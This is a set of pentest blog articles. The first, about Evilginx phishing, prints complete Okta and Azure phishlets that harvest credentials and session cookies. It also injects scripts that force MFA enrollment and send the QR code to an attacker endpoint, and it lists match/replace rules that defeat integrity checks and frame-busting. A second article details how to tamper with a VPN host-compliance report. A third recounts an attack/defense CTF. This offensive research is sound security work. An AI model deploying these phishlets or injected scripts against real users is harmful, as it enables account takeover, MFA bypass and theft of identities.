Usually, threat actors try to send malicious documents such as HTA applications or malicious Office documents but, with the growth of SMTP security solutions such as ProofPoint, the default Office hardening related to macros and the rise of awareness about phishing, these types of techniques are less and less used.

Today, threat actors do not perform phishing to get a direct initial access to the company network, but to retrieve the digital identity of a user: its Office365/GoogleWorkspace/Okta identity. They then reuse this identity through SSO applications until they find a way to breach the internal network through exposed applications such as Citrix or VPN.

To limit such attacks, companies started enforcing MFA to ensure that even if a threat actor successfully retrieves a valid set of user credentials through phishing or harvesting, he won’t be able to complete the authentication process or reuse them on a different application.

Phishing 101

IDP, cookies and phishing

The MFA protection implemented by companies is a good way to limit the impact of successful phishing. Indeed, even if the threat actor retrieves the user credentials, he won’t be able to spoof the user’s identity as he won’t be able to validate the MFA.

However, today the MFA is usually only asked during the first authentication: once the user is authenticated on the identity provider, it gives him a proof of authentication the user can forward to any service. With this proof of authentication, the user does not need any additional active authentication, therefore not needing to re-validate the MFA as long as the ticket is valid.

In the most common web IDPs such as Azure, Google or Okta, this ticket is represented by the cookies. When the user connects to the IDP for the first time, the service sends back a cookie that is valid for 1 hour, 1 day or 2 years. With these cookies, the user can connect to any other SSO-compliant web service without authentication.

In a nutshell, the user IDP cookies represent the user digital identity. Therefore, in a phishing attack whose primary goal is to spoof the user digital identity, the attacker will try to steal the cookies once the user has successfully performed his authentication.

Evilginx

Evil proxy

In order to steal the cookies, the attacker must be placed in a man-in-the-middle position during the authentication process. However, with TLS security enforced in the majority of IDP, the user will be aware that something wrong is happening.

That’s where Evilginx comes into play. Instead of performing a simple man-in-the-middle attack by relaying the packet to the IDP, Evilginx will create a malicious proxy: the user does not authenticate on accounts.google.com, but he will authenticate to login.evilginx.com:

I will not take more time to develop the evil-proxy principle as it is already well documented on the internet.

Phislets 101

For example, during the authentication to Azure, the following domains are used:

• login.microsoftonline.com
• www.microsoftonline.com
• aadcdn.microsoftonline.com

The problem is that during the authentication flow, the IDP will redirect the user to specific pages with the domain hardcoded in the response. For example, during a classic SAML authentication flow, the IDP will force the client to perform a POST request to a specific hardcoded domain. Therefore, even if the user started its authentication process on login.evilginx.com, during the authentication flow he will be redirected to login.microsoftonline.com breaking the man-in-the-middle position.

Evilginx uses specific configuration files known as phishlets to handle such cases. The phishlet configuration will allow Evilginx to know what domain must be re-written in the server response. So if the IDP sends back a response such as:

<form id=”SAML” action=”https://login.microsoftonline.com”>
[…]
</form>
<script>
document.getElementById(“SAML”).click()
</script>

With the phishlet, Evilginx will know that the domain login.microsoftonline.com must be rewritten and will send back to the target the following modified page:

<form id=”SAML” action=”https://login.evilginx.com”>
[…]
</form>
<script>
document.getElementById(“SAML”).click()
</script>

With such match and replace pattern, Evilginx is able to trap the user inside the malicious application even if the IDP tries to redirect the user to a specific page.

Auto-replace limits

The Evilginx phishlet auto-replace has its limits. Indeed, sometime the server does not directly hardcode the domain in the page but builds it through a JS script.

In this case, Evilginx is not able to automatically detect the domain pattern. As phishlet designers, we need then to understand how the script is working and manually replace the part building the redirection domain through a match/replace.

CORS

In Okta, authentication flow is based on several JS scripts fetched from the oktadcn domain. The script dynamically builds the redirection URL: it takes the Okta tenant name and appends ‘okta.com’. Therefore, when Okta tries to reach the specific page using the okta.com domain, it fails due to CORS protection (trying to reach okta.com/idp/idx/introspect from evilginx.com):

By debugging the application, it is possible to find where the URL building is done and modify it through a match and replace:

Replace: array");var t=
By: array");e.redirectUri=e.redirectUri.replace("okta.com","evilginx.com");var t=

With this simple indication, Evilginx will apply the match and replace on-the-fly, avoiding the redirection of the user outside of the phishing application.

JS integrity

When modifying the JS file or any other file through Evilginx, it can cause troubles due to the script integrity hash:

<script src="https://ok14static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.30.1/js/okta-sign-in.min.js" type="text/javascript" integrity="sha384-EX0iPfWYp6dfAnJ+ert/KRhXwMapYJdnU2i5BbbeOhWyX0qyI4rMkxKKl8N5pXNI" crossorigin="anonymous"/>

Indeed, if Evilginx modifies the okta-signing-widget script, its hash will not match the one set on the html file and the application will refuse to load it.

But, with Evilginx, we can also modify the html page to remove the integrity check:

Replace: integrity="[^"]*"
By: integrity=''

Redirect URI validation

The last point is the Redirect URI validation. Indeed, when doing OIDC authentication, the client will be redirected to a page with a URL like:

/oauth2/v1/authorize?client_id=XXXXXX&redirect_uri=https://trial-xxxxx.okta.com[...]

With the automatic domain replacement configured on Evilginx, the redirect URI parameter trial-xxxxx.okta.com will be automatically changed into trial-xxxxx.evilginx.com.

This will trigger the redirect uri validation process and because the evilginx.com domain has not been configured on the Okta end as a valid redirection domain, Okta will show the following error:

The redirect URI is dynamically built by Okta by taking the login domain and adding the callback parameters. It is then possible to bypass this error by modifying the JS script building the URL and ensure that the callback URI is the one expected by Okta:

Using Evilginx, it is possible to use the match/replace pattern to reset the redirect_uri to the right URI:

Replace: ,l.src=e.getIssuerOrigin()
By: ,l.src=e.getIssuerOrigin().replace("evilginx.com","okta.com")

Replace: var s=(n.g.fetch||h())(t
By: ,l.src=e.getIssuerOrigin().replace("evilginx.com","okta.com")

Basic phishlets

Okta

min_ver: '3.0.0'
name: 'okta-wavestone'

params:
  - name: okta_orga
    default: ''
    required: true
  - name: redirect_server
    default: https://google.com

proxy_hosts:
  - phish_sub: '{okta_orga}'
    orig_sub: '{okta_orga}'
    domain: okta.com
    session: true
    is_landing: true
    auto_filter: true

  - phish_sub: ok14static
    orig_sub: ok14static
    domain: oktacdn.com
    session: false
    is_landing: false
    auto_filter: true

  - phish_sub: login
    orig_sub: login
    domain: okta.com
    session: false
    is_landing: false
    auto_filter: true

sub_filters:
  - triggers_on: 'ok14static.oktacdn.com'
    orig_sub: ''
    domain: 'okta.com'
    search: 'array"\);var t='
    replace: 'array");e.redirectUri=e.redirectUri.replace("{basedomain}","{orig_domain}");var t='
    mimes: ['application/javascript']

  - triggers_on: '{okta_orga}.okta.com'
    orig_sub: ''
    domain: 'okta.com'
    search: integrity="[^"]*"
    replace: integrity=''
    mimes: ['text/html', 'charset=utf-8']

  - triggers_on: '{okta_orga}.okta.com'
    orig_sub: ''
    domain: 'okta.com'
    search: 'mainScript\.integrity'
    replace: 'mainScript.inteegrity'
    mimes: ['text/html', 'charset=utf-8']

  - triggers_on: 'ok14static.oktacdn.com'
    orig_sub: ''
    domain: 'okta.com'
    search: 'var s=\(n\.g\.fetch\|\|h\(\)\)\(t'
    replace: 't=t.replace("{orig_domain}","{domain}");var s=(n.g.fetch||h())(t'
    mimes: ['application/javascript']

  - triggers_on: 'ok14static.oktacdn.com'
    orig_sub: ''
    domain: 'okta.com'
    search: ',l\.src=e\.getIssuerOrigin\(\)'
    replace: ',l.src=e.getIssuerOrigin().replace("{orig_domain}","{domain}")'
    mimes: ['application/javascript']

  - triggers_on: 'ok9static.oktacdn.com'
    orig_sub: ''
    domain: 'okta.com'
    search: ',l\.src=e\.getIssuerOrigin\(\)'
    replace: ',l.src=e.getIssuerOrigin().replace("{orig_domain}","{domain}")'
    mimes: ['application/javascript']

auth_tokens:
  - domain: '{okta_orga}.okta.com'
    keys: ['idx:always']

credentials:
  username:
    key: ''
    search: '"identifier":"([^"]*)"'
    type: 'json'

  password:
    key: 'passwd'
    search: '(.*)'
    type: 'post'

login:
  domain: '{okta_orga}.okta.com'
  path: '/'

force_post:
  - path: '/kmsi'
    search:
      - {key: 'LoginOptions', search: '.*'}
    force:
      - {key: 'LoginOptions', value: '1'}
    type: 'post'

Azure

name: 'o365-wavestone'
min_ver: '3.0.0'

proxy_hosts:
  - phish_sub: 'login'
    orig_sub: 'login'
    domain: 'microsoftonline.com'
    session: true
    is_landing: true

  - phish_sub: 'www'
    orig_sub: 'www'
    domain: 'office.com'
    session: true
    is_landing:false

  - phish_sub: 'aadcdn'
    orig_sub: 'aadcdn'
    domain: 'msftauth.net'
    session: false
    auto_filter: true
    is_landing:false

auth_tokens:
  - domain: '.login.microsoftonline.com'
    keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT']
  - domain: 'login.microsoftonline.com'
    keys: ['SignInStateCookie']

credentials:
  username:
    key: 'login'
    search: '(.*)'
    type: 'post'
  password:
    key: 'passwd'
    search: '(.*)'
    type: 'post'

auth_urls:
  - '/common/SAS/ProcessAuth'
  - '/kmsi'

login:
  domain: 'login.microsoftonline.com'
  path: '/'

force_post:
  - path: '/kmsi'
    search:
      - {key: 'LoginOptions', search: '.*'}
    force:
      - {key: 'LoginOptions', value: '1'}
    type: 'post'
  - path: '/common/SAS'
    search:
      - {key: 'rememberMFA', search: '.*'}
    force:
      - {key: 'rememberMFA', value: 'true'}
    type: 'post'

Automate critical actions

Adding MFA device

Once an attacker is able to retrieve an initial access to the user session, he needs to add access persistence as the cookies have a limited validity timeframe.

This is usually done by adding an additional MFA device to the user account.

For example, on Azure, adding an MFA device does not ask for user reauthentication or MFA validation. So, as long as the attacker has access to the user session, he is able to directly register his malicious MFA device.

However, on some IDP such as Okta, the MFA registration asks for an MFA validation. So even if the attacker successfully has compromised the user’s Okta session, he won’t be able to directly add a MFA.

What could be interesting is to add this reauthentication step during the phishing attack:

1. The user authenticates a first time to access his session
2. Evilginx steals the user cookies
3. Evilginx performs automatic API calls to trigger the MFA device registration authentication in the backgroup
4. The user revalidates his MFA thinking the first one failed
5. Evilginx intercepts the MFA QRCode allowing the attacker to finalize the MFA registration process

All these actions can be automated through Evilginx by modifying the JS scripts.

First, Evilginx will intercept the redirection performed at the end of the first authentication and redirect the user to a fake controlled page:

  - trigger_domains: ['{okta_orga}.okta.com']
    trigger_paths: ['/app/UserHome']
    script: |
      if(document.referrer.indexOf('/enduser/callback') != -1){document.location = 'https://'+window.location.hostname+'/help/login'}

This script will be injected only in the /app/UserHome page and be triggered only when the page is accessed from the /enduser/callback page. It ensures that the user is redirected to the decoy page only when the first authentication flow is finished. In this case the decoy page is the okta /help/login page. This redirection to a decoy page is mandatory otherwise the user is blocked in a infinite redirection loop at the end of his authentication flow…

Then, a new JS code is added to the /help/login page. This script is used to enumerate the available MFA technologies available and configured:

  - trigger_domains: ['{okta_orga}.okta.com']
    trigger_paths: ['/help/login']
    script: |
      function u4tyd783z(){
        fetch('/api/v1/authenticators')
        .then((data) => {
            data.json().then((jData)=>{
                let id = undefined
                for(let elt of jData){
                    if(elt.key == 'okta_verify'){
                        id = elt.id
                    }
                }
                if(id == undefined){
                    return
                }
                console.log('https://'+window.location.hostname+'/idp/authenticators/setup/'+id)
                document.location = 'https://'+window.location.hostname+'/idp/authenticators/setup/'+id
            })
        })
      }
      u4tyd783z();

The script chooses the Okta Verify authentication method and redirects the user to the setup page.

On the setup page, a new JS script is injected. This JS script is used to automate the registration steps to only let the MFA validation form:

- trigger_domains: ['{okta_orga}.okta.com']
    trigger_paths: ['/idp/authenticators/setup/.*']
    script: |
      function u720dhfn2(){
        if(document.querySelectorAll('.button.select-factor.link-button').length > 0){
            document.querySelectorAll('.button.select-factor.link-button')[0].click()
            document.querySelectorAll('body')[0].style.display = 'none'
            a = true
        }
        if(document.querySelectorAll('a.orOnMobileLink').length > 0){
            document.querySelectorAll('a.orOnMobileLink')[0].click()
            b = true
        }
        if(document.querySelectorAll('img.qrcode').length > 0){
            fetch("{qrcode_sink}", {
              method: 'POST',
              body: JSON.stringify({code: document.querySelectorAll('img.qrcode')[0].getAttribute('src')})
            }).then(()=>{
              document.location='{redirect_server}'
            }).catch(()=>{
              document.location='{redirect_server}'
            })
            clearInterval(myInterval)
        }
      }
      var a = false
      var b = false
      var myInterval = setInterval(function(){u720dhfn2()}, 10)

Once the user has validated the MFA authentication, the script will locate the QRCode displayed in the page and exfiltrate it through HTTP.

The attacker can then retrieve the QRCode and enroll his own device.

Pushing the limit

Okta with Azure authentication

Some companies can link two IDP together: Okta redirects to Azure and provisions the user when they first login.

In this case it is interesting for an attacker because he will be able to retrieve Azure and Okta session in one phishing.

The previous phislets must be merged in order to capture both authentications. The important point is to ensure that Okta will redirect to the Azure Evilginx and not to the login.microsoftonline.com website.

Hopefully, the redirection is made with a plaintext form in the Okta response with an auto-submit HTML form:

<form id="appForm" action="https://login.microsoftonline.com/7ee59529-c0a4-4d72-82e4-3ec0952b49f4/saml2" method="POST">[...]</form>

Because the Azure domain is hardcoded directly on the HTML, Evilginx will be able to automatically switch the real domain by the phishing domain.

Likewise, for the redirection from Microsoft to Okta once the authentication flow ends, Evilginx will also be able to automatically swap the Okta domain by the Okta Evilginx domain allowing the retrieval of the Azure session cookie.

In a nutshell, in this specific case, it is possible to simply merge the two previous phishlets.

Frame buster

More and more users will look at the authentication URL before inputting their credentials. In order to prevent such detection, it is possible to use a Browser in browser technique.

The idea is to embed the phishing application into an iFrame and create a Chrome lookalike frame around the iframe in order to make the iframe appear as a popup.

Because we are redesigning the while popup, it is possible to display a wrong address. In the following figure, the Google form is embedded in an iframe but look like a real popup:

The main problem here is that the majority of IDP authentication forms implements several techniques to avoid being embedded in an iframe. These techniques are called framebuster.

While Okta does not seem to implement such techniques, the Azure authentication form contains a lot of features that would break if embedded in an iframe.

Self == top

The simplest framebuster technique is to check if the current frame is the top frame, which Microsoft implements. If it detects that the authentication form is not the top frame, it does not display the form.

With Evilginx, it is possible to remove the check with a simple match and replace pattern:

Replace: if(e.self===e.top){
By: if(true){window.oldself=e.self;e.self=e.top;

This modification ensures that the iframe is recognized as the top frame.

Target=”_top”

The next technique consists in forcing the form submit to redirect the top frame. Therefore, if the form is submitted in an iframe, it will not only redirect the iframe, it will redirect the whole page, breaking the Browser-in-browser.

This can be done by adding the target=”_top” attribute in the form. It is then possible to remove this protection with Evilginx:

Replace: method="post" target="_top"
By: method="post"

Framework specific

Microsoft uses a specific framework for their application. The framework does not embed framebusting technique per say, but its internal functioning makes it quite complicated to embed in an iframe.

The limitation is that at a specific moment, the framework tries to post to a specific URL that is built up using the top frame domain. So instead of posting the data to login.evilginx.com, it will post it to my-phishing-app.com which will fully break the authentication process.

In order to change this address, it is not possible to simply swap the domain with the phishing domain as it was previously done in the previous part. We need to understand how the framework works to change the value manually in the root element:

Replace: autoSubmit: forceSubmit, attr: { action: postUrl }
By: autoSubmit: forceSubmit, attr: { action: \\'/common/login\\'}

HTTP header

The last framebusting technique is related to the HTTP header X-Frame-Options: DENY that indicate to the browser that the application cannot be displayed in an iFrame.

It is possible to simply remove this header with Evilginx:

Replace: X-Frame-Options: DENY
By: Test: Test

Final phishlet

The following video shows an example of browser in browser phishing on a company using Okta/Azure. The attacker will be able, in a single phishing to:

• Retrieve the Azure credentials
• Retrieve the Azure cookies
• Retrieve the Okta cookies
• Retrieve the MFA enrollment QRCode for Okta

Example of browser in browser phishing on a company using Okta/Azure

The evolution of phishing techniques, exemplified by tools like Evilginx, underscores a critical shift in cyber threats—from merely capturing credentials to hijacking entire authenticated sessions. By acting as an adversary-in-the-middle (AiTM), Evilginx can intercept and manipulate traffic between users and legitimate services, effectively bypassing traditional Multi-Factor Authentication (MFA) mechanisms.

But this is only the tip of the iceberg. Indeed, Evilginx can be used and customized to automate specific critical actions such as MFA registration, to bypass specific securities such as framebuster, ensuring that the attacker will get persistent access to the user session.

The only way to limit phishing attacks is to deploy phishing resistant MFA such as FIDO keys for at least the administrators.

Cet article Phishing: Pushing Evilginx to its limit est apparu en premier sur RiskInsight.

A great part of pentester’s job is to bypass the restrictions set up by security tools, this VPN being the perfect exercise for a pentester.

This article is not meant to show a fancy 0day, but to expose the thinking pentesters use when dealing with a black box security tool.

The exploit path presented in this article takes for granted that:

• The attacker already has access to a valid set of user’s credentials
• The attacker has managed to get a limited access to a workstation for a limited period of time

Depending on the VPN configuration, this last prerequisite can be optional.

Discovering the environment

With access to the computer, the first thing we tried was to extract the VPN client binary and use it on the attack computer.

The VPN tested was the Palo Alto GlobalProtect solution, and the VPN client can be easily downloaded on Internet. Once the client is installed on the computer, a connection is initialized. The VPN initialized a connection with the VPN portal exposed on Internet and a Microsoft authentication is triggered:

The domain credentials worked, and the VPN tunnel was successfully mounted. However, all connections were filtered, and it was not possible to even reach the domain controller as it had initially been hinted by the clients.

Global Protect Host Information Profile

Global Protect VPN, as several other business VPN, allows administrators to define a host information policy.

This host information policy allows the server to verify that the user computer is compliant with the company’s security policy before allowing access to the company’s internal network.

This type of access control can be tuned, and administrators can simply reject any non-compliant devices as well as limit the protocols allowed for the device. For example, a computer that does not comply with the company’s security policy could be restricted to only access a web application exposed in the internal network but not access any other internal resource.

The VPN client then collects host information once the user has successfully signed in on the VPN gateway and an update is sent on a regular basis to ensure the computer is still compliant with the company’s security policy.

Information collected

Global Protect can collect the following information:

• General: Information about the host itself such as hostname, logon domain, OS etc…
• Patch Management: Information about any patch management software installed on the machine
• Firewall: Information about the firewall software deployed and its status
• Anti-malware: Information about the anti-malware/anti-spyware software deployed and its status
• Disk backup: Information on whether disk backup software is installed and enabled
• Disk encryption: Information on whether disk encryption software is installed as well as which disks are encrypted and what encryption method is used
• Data loss prevention: Information on whether a DLP software is installed and enabled
• Certificate check: Information on the certificates deployed on the computer
• Custom checks: Information on registry keys, user-space application etc…

All the information collected can be retrieved on the client GUI:

Thus, if you have access to a machine that can legitimately connect to the VPN, it is possible to retrieve a sample of an allowed host configuration.

Hijack the profile

The host profile (that will be named HIP report from now) is thus generated by the host and sent to the gateway.

The first thick client pentesting rule is: If you generate it, you can tamper it. Thus, instead of modifying the host configuration – which can be painful and require the knowledge of how Global Protect retrieves this information – it should be possible to tamper the HIP report sent to the VPN gateway.

Go in easy with a proxy

A quick and dirty way to tamper the HIP report is to intercept the requests and modify the report sent to the VPN.

The VPN client communicates with the VPN gateway using the HTTPS protocol. Therefore, it is only possible to intercept the traffic and modify the content sent if the VPN does not securely check the VPN gateway certificate.

In order to intercept the traffic, we need to:

1. Configure Burp as a transparent proxy and configure the redirection in Burp to forward the request to the VPN gateway
   
   
   
   
2. Add the Burp certificate to the Windows certificate store
3. Specify the Burp address as a VPN gateway in GlobalProtect
   
   

From now, when a VPN connection is performed, Burp will be able to intercept the traffic. However, with this technique, it was not possible to login:

It was not possible to understand what raised this error, maybe due to some certificate pinning or other security solutions: the easy solution did not yield any positive result.

Understand the logic

The Burp solution out of the way, it appeared mandatory to understand how the VPN works. The first thing done was to monitor the VPN processes during the connection to identify the VPN executables to target and what their role in the profile generation is.

ProcessHacker showed several processes implied in the profile generation:

• PanGps.exe: executed as Administrator
• PanGpa.exe
• PanGpHip.exe
• PanGpHipMp.exe

Procmon gave a lot of information and showed that the PanGpHip.exe and PanGpHipMp.exe binaries were launched by the PanGps.exe binary:

Finally, exploring the Global Protect installation folder showed several detailed log files, which have been really helpful during the reverse and debugging process:

Additionally, during the VPN connection an XML file is created and contains the full HIP Report that has been generated during the connection process. However, the creation of this file was not reported in Procmon.

In order to ease the exploitation, the report generated on the domain joined machine was retrieved. Depending on the VPN configuration, part or totality of this report can be guessed but it will complexify the exploitation scenario.

Static approach

The idea was to understand the purpose of each executable and how they were communicating with each other.

PanGPA.exe

Killing the PanGPA.exe process showed that it corresponded to the user GUI. Nothing really interesting appeared in this executable.

PanGpHip

The PanGpHip.exe binary was the first to be reversed as its name gave hints on its features.
Ghidra was used to analyze the .rdata section to look at the hardcoded strings. Several strings could help to understand the goal of the binary.

For example, the following strings shows that this executable is used to retrieve the host configuration:

Likewise, the following string shows that the process write the HIP report:

Looking at the references for these strings shows, they are part of a C++ object:

Indeed, the vftable is a table containing all virtual functions from a C++ object. It can be guessed that all the functions contained in this vftable are used to retrieve some configuration information on the host.

After analyzing each virtual method, it is possible to start understanding how the object works:

From now on, it is a known fact that this binary is used to generate the HIP Report. However, the string pan_gp_hrpt.xml, which is the filename of the file containing the Hip Report and written on the disk is not present in the binary. Therefore, there is a high probability that the XML report it is not written on the disk by this executable.

The first idea was the PanGpHip.exe binary generates the report and forwards it to the PanGPS.exe executable that will write it on the disk as it is the only one executed with Administrator privileges, so with enough privileges to write in the Program Files directory.

The issue was to ensure that the report generated by the binary was the XML report is actually sent to the VPN gateway and is not an aggregation of binary data that could not be easily modified.

In order to avoid reversing several functions, a dynamic approach was preferable for this task. The binary is not statistically compiled, and several Win32 Api are used. Using ApiMonitor it is possible to spy on the Win32 API calls performed by the binary.

ApiMonitor was configured to intercept every call performed to the WriteFile Win32 API. At the end of the PanGpHip.exe execution, the full XML report was written in a file:

However, it was not possible at this moment to find the file where this content was written on. This point was set aside for a moment to progress on the reversing of the parent binary.

PanGPS

We saw earlier through Procmon that PanGPS.exe launches the PanGpHip.exe binary. Through Ghidra, it is possible to search how it is launched. This information is interesting because if a communication is performed among binaries, some PIPE or sockets should be used to allow the interprocess communication, with a high probability that they are created by the parent process.

The following code is used to run the PanGpHip.exe process:

The process creation is performed using the Win32API CreateProcess. The StartupInfo object is created with the following code:

The stdin, stdout and stderr file are overwritten with custom PIPE created by PanGPS.exe as it is shown in the following figure:

Thus, through these PIPE objects the PanGpHip.exe process will be able to communicate the Hip Report generated.

Using API Monitor this assumption has been verified. The tool was configured to intercept the CreatePipe, ReadFile and WriteFile Win32 API calls. First, it was verified that the PanGPS.exe binary really read the HIP Report:

This API call shows that the XML report is, at a moment, forwarded from PanGpHip.exe to PanGPS.exe. Looking at the parameters used in the ReadFile, the PanGPS.exe binary read the data from the 0x5A0 handle.
Looking at the CreatePipe calls, this handle represents the PIPE used as the stdout for the PanGpHip.exe process:

Likewise, if the WriteFile API call performed by the PanGpHip.exe process is analyzed, the handle that is used will be the one related to the stdout PIPE created by the PanGPS.exe process.
The following figure summarizes the interactions between the different components:

With:

• PanGPS: the high integrity process that communicates with the VPN gateway
• PanGpHip: the process spawned by PanGPS that generate the compliance report
• PanGpHipMip: the process spawned by PanGPS that check for known vulnerabilities on the different host programs

Tamper the profile

The previous figure highlighted that hijacking PanGpHip to write a tampered compliance report on its stdout should be sufficient:

A simple C code was written:

Then the PanGpHip.exe file was replaced by this program and a VPN connection was attempted. However, looking at API Monitor, the PanGPS.exe process never retrieved the HIP Report. Actually, the thread used to launch and parse the PanGpHip.exe process was in an idle state (this can be seen in APIMonitor cause the calls performed by each thread were highlighted in a unique color).

Looking in the code of PanGPS.exe, the following wait condition can be seen:

The WaitForMultipleObject condition stalls the PanGPS.exe program as long as the child process does not raise a given event.

It was possible to dynamically retrieve the event definition using APIMonitor again, analyze the parameters used with WaitForMultipleObject and linking the ID with the related CreateEvent parameters.
Looking at the code, the binary creates a specific event using the CreateEvent Win32 API. APIMonitor confirmed that this event is in the list of the waited event.

Another C code, taking this event into account, was written:

Once again, the program was compiled, and used to replace the PanGpHip.exe file. However, even with this modification, the PanGPS binary did not receive the full report.

Using, API Monitor, it was noted that the printf did not use the WriteFile Win32API at all. At first, we thought that under the hood, printf would call the WriteFile API as it just writes data into a PIPE but that was a wrong assumption.

The program is once again modified to use the WriteFile API:

Even with this modification, it was not possible to retrieve the report in the PanGPS.exe binary. Our last option was to reverse, again, the PanGpHip.exe binary to understand how it writes the data in the PIPE.

In fact, the process does not directly write the report in the PIPE, it first writes 10 bytes that represent the size of the report, and then, the full report. This behavior is quite expected as the PanGps.exe process read the full report in one call and, thus, must know the full size of the report to be able to use the ReadFile Win32Api.

Thus, the exploit binary must:

1. Compute the report final size
2. Format the size on a 10-byte string
3. Write this size on the communication PIPE handled by stdout
4. Notify the PanGPS.exe process using the HipReportReadyInOtherProcess event
5. Write the report on the communication PIPE handled by stdout
6. Notify the PanGPS.exe process using the HipReportReadyInOtherProcess event

Finally, the script was modified as follows:

Once the VPN is launched, the modified script is executed, and the tampered profile is sent to the VPN gateway instead of the profile that would be generated by the initial PanGpHip.exe binary.

As the profile sent matched a compliant profile expected by the VPN gateway, the rogue computer was granted access to the internal network without restrictions.

Conclusion

VPN clients and appliances are interesting as they allow remote workers to access the internal network and emulate an in-office experience. However, they also expand the attack surface as an attacker could use them to remotely access the internal network.

In order to mitigate these risks, VPN companies set up some verification rules to avoid unknown devices to access the internal network. These rules often take place as compliance checks that cannot be easily tampered with.

However, because the compliance report is generated directly by the host, an attacker can simply hijack the part of the program that sends the report to the VPN Gateway and injects its own tampered report. Thus, this compliance checks must not be taken as a proof that the connecting computer belongs to the organization.

An “easy” way to prevent these kinds of attacks is to authenticate the user AND the computer accessing to the VPN. This can be done through the use of a machine certificate verification with an asymmetric authentication process.

An 802.1X-like authentication protocol using certificates could be a viable solution for VPN access as this authentication mechanism authenticates the computer, giving a proof that the connecting computer really belongs to the organization.

In this case, even if the attacker can tamper with the compliance checks performed, he will not be able to pass the computer authentication validation and won’t be able to access to the internal network.
However, these solutions can still be bypassed with computer certificate extraction or vulnerability related to 802.1X authentication, but these attacks need Administrators privileges on the computer and/or a physical access to the machine: if an attacker already has Administrators rights or physical access to one of your Domain Workstation, there are way more serious troubles ahead. Additional protections can also be set in place to further harden the access to the certificate, such as storing them on a Virtual Smartcard hosted on the TPM chip.

In a nutshell, if the compliance checks have been set up to avoid users connecting personal devices with a degraded level of security to the VPN, it can do the job.

However, if they have been set up as a network access control mechanism to avoid attackers with valid credentials and host configuration to access to the internal network using their attack machine, they are not sufficient.

Yoann DEQUEKER
Senior Auditor

Cet article Bypassing host security checks on a modern VPN solution est apparu en premier sur RiskInsight.

The attack/defense (A/D) format

During this the A/D exercise, teams have literally been competing against each other, on the 10AM – 7PM slot, with the 10AM-11AM slot dedicated to hardening rather than attack. Each teams had two virtual machines that were running a variety of services:

• The first VM hosted services in Docker containers: songs/singers management webapp, auction website, binary application to emulate a business service, etc.
• The second VM offered services directly on the host, through services and workers ran by dedicated users: CVE search website, remote control webapp, etc.

The services had been intentionally modified to include vulnerabilities, misconfigurations and backdoors that can be exploited. Upon exploitation, for each service there was a flag file that could be stolen to bring points to the exploiting teams, and remove points from the victim. Flags were renewed every two minutes by the organizer’s bot, so teams were gaining and losing points as long as the services remained vulnerable.

There were also misconfigurations in the Docker containers and on the host that allowed for lateral movement between the services, escape from the containers and even privilege escalation to root for complete takeover and persistence.

Finally, to provide a kind of realism for the exercise, the teams had to keep the services operating or they would lose SLA points. Preventing the organizers to renew or read the flags also result in point loss.

Given the nature of the exercise, the teams were encouraged to patch their services during the CTF to remove the vulnerabilities. However, in doing so it was easy to damage a feature of the service and to lose points in the process: since the SLA checks were not documented, there was no way at first to know if we could remove the vulnerable part of the application or if we had to spend time to keep it running.

Let’s talk strategy!

In this CTF format, there are few valid strategies to try and win the 1st place:

• Focus on attack: there are many other teams so while they remain vulnerable, a single exploit could provide access to many flags and points
• Focus on defense: if the services are correctly patched and no persistence is established, it is easier to later focus on how to exploit while preventing point loss
• Split the team to do a little bit of both

The attack strategy

The teams had one hour before the opening of the network links between each other, so this had to be spent to analyze their own services. The goal at this point is to quickly identify vulnerabilities that can be exploited in a few lines of codes, so configuration and code review is key:

• The little-known grep tool that allows for identification unsafe of function use (for example shell_exec and system in PHP, execSync in NodeJS, etc.)
• The LinPEAS / Linux-Smart-Enumaration open-source tools to find misconfigurations on the hosts

Due to the fact that security issues had mainly been voluntarily introduced in the applications rather than embedded within the codebase in a complex way, this strategy is efficient: calls to vulnerable functions can easily be traced back to URL and API endpoints with few prerequisites for exploitation.

However, the downside is that exhaustivity is hard: the codebase and amount of misconfigurations is high enough not to find them in one hour. And with webshells appearing everywhere once the exercise starts, searching for code execution functions or public keys is not always representative.

The defense strategy

This strategy is really all about preventing point loss rather than making points. On the long term, teams gain more points by exploiting the services than losing from not patching them, so it is not a viable strategy for the whole CTF.

The teams had been informed a couple weeks ago by the organizers about the nature of the exercise and on some details of the infrastructure. Therefore, teams had some time to prepare defense mechanisms, although the exact nature of challenges was not really known.

We also figured that visibility was key, for a lot of reasons: finding the nature of SLA checks, detecting exploit attempts, detecting flag leaks or communication with other teams infrastructure. In this effort, the following tools can be used to observe what’s happening in the infrastructure:

• At the system level: auditd, and if motivated forwarding logs to a SIEM instance to automatically detect strange behavior
• At the application level: Apache logs and mod_security to find execution errors, malicious payloads and also block some of the attempts
• At the network level: tcpdump, tshark and Wireshark, which give the most insight on the other teams’ activity towards our own infrastructure, but is limited by encrypted protocols and volumetry of traffic

The “why not both” strategy

Teams were limited to 5 people onsite, so this strategy may be the most efficient, it is not really optimal given the conditions of this exercise. However, it is still what most teams do because it is hard to properly organize on-the-fly. However, it can be optimized by assigning players on both attack and defense on a single service rather than specializing them in attack or defense.

What we did in practical

During the pre-exercise phase, we thought that the ratio between binaries and web applications would be quite balanced, so we had to come up with protections for both:

• For binaries, most of the exploits use vulnerabilities to launch a shell to read the flag, or the chain open-read-write operations to print the flag contents on the standard output. We tried to rely on the SECCOMP kernel feature that mimics a firewall logic (based on the BPF technology) to allow or prevent some system calls and apply constraints on their arguments: the goal here was to learn about that normal behavior, and block all deviations, either execve system calls to launch a shell or open system calls on the flag file.
• For web applications, we thought that deploying Apache mod_security was a good compromise in terms of setup complexity, gain in visibility and basic exploit prevention. We also came up with a list of functions that could be used in a malicious way, such as system, shell_exec, eval and so on.
• Finally, since we knew there would be Docker containers, we thought about ensuring that none of them were too privileged to allow for container escape and host compromise.

Finally, we knew about the flag system and the frequency of flag change, so we designed a Python orchestrator to run exploit scripts, collect flags, and submit them to the validation platform.

On D-Day, during configuration review on the hosts, we noticed that SECCOMP had been disabled at the kernel level, so our winning strategy took its first hit. However, there was only 1 binary for 6 web applications, so its efficiency would have been limited.

We spent the first hour trying to identify the quick win vulnerabilities and found some of them. We swiftly developed scripts to exploit them with our orchestrator and thought that we were ready for the opening of communication between teams. We were not. Almost half of the teams had patched the vulnerabilities we had found, and many of them were stealing flags we thought we had patched vulnerabilities for. We realized at this point that for each flag there would be many more vulnerabilities leading to their theft.

